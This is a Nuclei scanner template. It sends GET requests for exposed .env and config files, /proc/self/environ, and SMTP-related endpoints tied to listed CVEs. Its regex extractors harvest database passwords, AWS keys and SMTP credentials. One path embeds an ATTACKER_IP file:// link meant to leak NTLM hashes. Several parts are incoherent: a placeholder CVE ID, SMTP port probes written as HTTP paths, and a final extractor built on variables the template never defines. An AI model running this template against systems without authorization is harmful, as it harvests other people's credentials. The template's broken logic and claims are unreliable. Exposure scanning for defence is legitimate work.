id: env-exp
info:
  name: Laravel .env file accessible
  author: nucleixivanovich
  severity: critical
  description: Laravel uses the .env file.
  reference: https://neal.fun/
  tags: config,exposure,laravel

http:
  - method: GET
    path:
      # original .env enumeration
      - "{{BaseURL}}/.env"
      - "{{BaseURL}}//.env"
      - "{{BaseURL}}/.env.backup"
      - "{{BaseURL}}/.env.bak"
      - "{{BaseURL}}/.env.config"
      - "{{BaseURL}}/.env.dev"
      - "{{BaseURL}}/.env.dev.local"
      - "{{BaseURL}}/.env.development.local"
      - "{{BaseURL}}/.env.example"
      - "{{BaseURL}}/.env.live"
      - "{{BaseURL}}/.env.local"
      - "{{BaseURL}}/.env.old"
      - "{{BaseURL}}/.env.prod"
      - "{{BaseURL}}/.env.prod.local"
      - "{{BaseURL}}/.env.production"
      - "{{BaseURL}}/.env.production.local"
      - "{{BaseURL}}/.env.save"
      - "{{BaseURL}}/.env.stage"
      - "{{BaseURL}}/.env.staging"
      - "{{BaseURL}}/.env.testing"
      - "{{BaseURL}}/.env.www"
      - "{{BaseURL}}/.env.{{DN}}"
      - "{{BaseURL}}/.env.{{SD}}"
      - "{{BaseURL}}/.env_1"
      - "{{BaseURL}}/.env_sample"
      - "{{BaseURL}}/.envrc"
      - "{{BaseURL}}/actuator/env"
      - "{{BaseURL}}/actuators/env"
      - "{{BaseURL}}/api/.env"
      - "{{BaseURL}}/api/.env"
      - "{{BaseURL}}/cgi-bin/printenv.pl"
      - "{{BaseURL}}/conf/cassandra-env.sh"
      - "{{BaseURL}}/config/environment.rb"
      - "{{BaseURL}}/env"
      - "{{BaseURL}}/env.dev.js"
      - "{{BaseURL}}/env.development.js"
      - "{{BaseURL}}/env.js"
      - "{{BaseURL}}/env.prod.js"
      - "{{BaseURL}}/env.production.js"
      - "{{BaseURL}}/env.sh"
      - "{{BaseURL}}/env.test.js"
      - "{{BaseURL}}/environment.rb"
      - "{{BaseURL}}/proc/self/environ"
      - "{{BaseURL}}/redmine/.env"
      - "{{BaseURL}}/redmine/config/environment.rb"
      - "{{BaseURL}}/config/.env"
      - "{{BaseURL}}/config/.env.*"
      - "{{BaseURL}}/configs/.env"
      - "{{BaseURL}}/configs/.env.*"
      - "{{BaseURL}}/conf/.env"
      - "{{BaseURL}}/conf/.env.*"
      - "{{BaseURL}}/configuration/.env"
      - "{{BaseURL}}/configuration/.env.*"
      - "{{BaseURL}}/settings/.env"
      - "{{BaseURL}}/settings/.env.*"
      - "{{BaseURL}}/private/.env"
      - "{{BaseURL}}/private/.env.*"
      - "{{BaseURL}}/secrets/.env"
      - "{{BaseURL}}/secrets/.env.*"
      - "{{BaseURL}}/env.$APP_ENV.local"
      - "{{BaseURL}}/.env.dist"
      - "{{BaseURL}}//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

      # CVE-2018-10814: SynaMan SMTP credential disclosure
      - "{{BaseURL}}/config/AppConfig.xml"
      # CVE-2024-28186: FreeScout SMTP credentials leak
      - "{{BaseURL}}/conversation/ajax-html/send_log?folder_id=&thread_id=1"
      # CVE-2025-0760: Generic admin-UI SMTP disclosure
      - "{{BaseURL}}/admin/settings/smtp"
      # CVE-2001-0504: Microsoft Windows SMTP AUTH bypass (HELO/AUTH)
      - "{{BaseURL}}:25"
      # CVE-2022-2370: YaySMTP WordPress plugin leak
      - "{{BaseURL}}/wp-admin/options-general.php?page=yaysmtp_settings"
      # CVE-2017-14461: Dovecot OOB info leak via SMTP DATA
      - "{{BaseURL}}:25"
      # CVE-2023-23397: Outlook Net-NTLMv2 hash leak
      - "{{BaseURL}}/owa/calendar/{{User}}/reminders"
      # CVE-2024-21413: Outlook MonikerLink SMB AUTH challenge leak
      - "{{BaseURL}}/blog/file://ATTACKER_IP/test!exploit"
      # CVE-2024-33470: AVTECH device DOM disclosure
      - "{{BaseURL}}/settings"
      # GHSA-9qjp-g446-qv5p / CVE-2024-XXXX: Bitrix24 SMTP settings exposure
      - "{{BaseURL}}/bitrix/admin/imconnector_admin.php?ID=smtp&lang=en"
      # CVE-2025-24000: Post SMTP WordPress plugin REST API logs exposure
      - "{{BaseURL}}/wp-json/post-smtp/v1/logs"
      # CVE-2023-6875: POST SMTP Mailer connect-app REST endpoint auth bypass
      - "{{BaseURL}}/wp-json/post-smtp/v1/connect-app"
      # CVE-2024-6694: WP Mail SMTP by WPForms settings leak
      - "{{BaseURL}}/wp-admin/admin.php?page=wp-mail-smtp"
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "(?mi)^\\s*#?^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)="
          - "(?mi)^\\s*#?^DB_(HOST|PASSWORD|DATABASE)="
          - "(?mi)^\\s*#?^(SQS|SNS|SES|BACKUP|AWS)_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)[=:]"
          - "(?i)(FTP_(USER|PASS))"
          - "(?i)aws_access_key_id\\s*=\\s*"
          - "(?mi)smtpPassword"
          - "(?mi)Swift_Transport_Esmtp_Auth_LoginAuthenticator->authenticate"
          - "(?mi)configured_password"
          - "(?mi)2\\.2\\.[0-9]+"
          - "(?mi)PidLidReminderFileParameter"
          - "(?mi)NTLMSSP_AUTH"
          - "(?mi)<input[^>]*(name|id)=[\"']smtp_password[\"'][^>]*value=[\"']([^\"']+)[\"']"
          - "(?mi)yaysmtp_smtp_pass"
          - "(?mi)\"password\"\\s*:\\s*\"[^\"]+\""   # REST JSON password field
        condition: or

    extractors:
      - type: regex
        part: body
        name: smtp_host
        regex:
          - "(?mi)^\\s*#?SMTP_(ADDRESS|HOST)\\s*[=:]\\s*([^\\s]+)"
      - type: regex
        part: body
        name: smtp_port
        regex:
          - "(?mi)^\\s*#?SMTP_PORT\\s*[=:]\\s*([^\\s]+)"
      - type: regex
        part: body
        name: smtp_user
        regex:
          - "(?mi)^\\s*#?(SMTP_USER|EMAIL_SMTP_USER)\\s*[=:]\\s*([^\\s]+)"
      - type: regex
        part: body
        name: smtp_pass
        regex:
          - "(?mi)^\\s*#?(SMTP_PASS|EMAIL_SMTP_PASS)\\s*[=:]\\s*([^\\s]+)"
      - type: regex
        part: body
        name: post_smtp_logs
        regex:
          - "(?mi)logEntries"
      - type: regex
        part: body
        name: connect_app
        regex:
          - "(?mi)authKey"
      - type: regex
        part: body
        name: wp_mail_smtp_pass
        regex:
          - "(?mi)wp_mail_smtp_password"
      - type: regex
        part: body
        name: password_field
        regex:
          - "(?mi)\"password\"\\s*:\\s*\"([^\"]+)\""

extractors:
  - type: dsl
    name: env_credentials
    dsl:
      - '"DB_HOST="+db_host+"|DB_PORT="+db_port+"|DB_USER="+db_user+"|DB_PASS="+db_password'
  - type: dsl
    name: smtp_credentials
    dsl:
      - '"SMTP_HOST="+smtp_host+"|SMTP_PORT="+smtp_port+"|SMTP_USER="+smtp_user+"|SMTP_PASS="+smtp_pass'
  - type: dsl
    name: post_smtp_rest
    dsl:
      - '"POST_SMTP_LOGS="+post_smtp_logs'
  - type: dsl
    name: connect_app_leak
    dsl:
      - '"CONNECT_APP_AUTH="+connect_app'
  - type: dsl
    name: wp_mail_smtp_leak
    dsl:
      - '"WP_MAIL_SMTP_PASS="+wp_mail_smtp_pass'
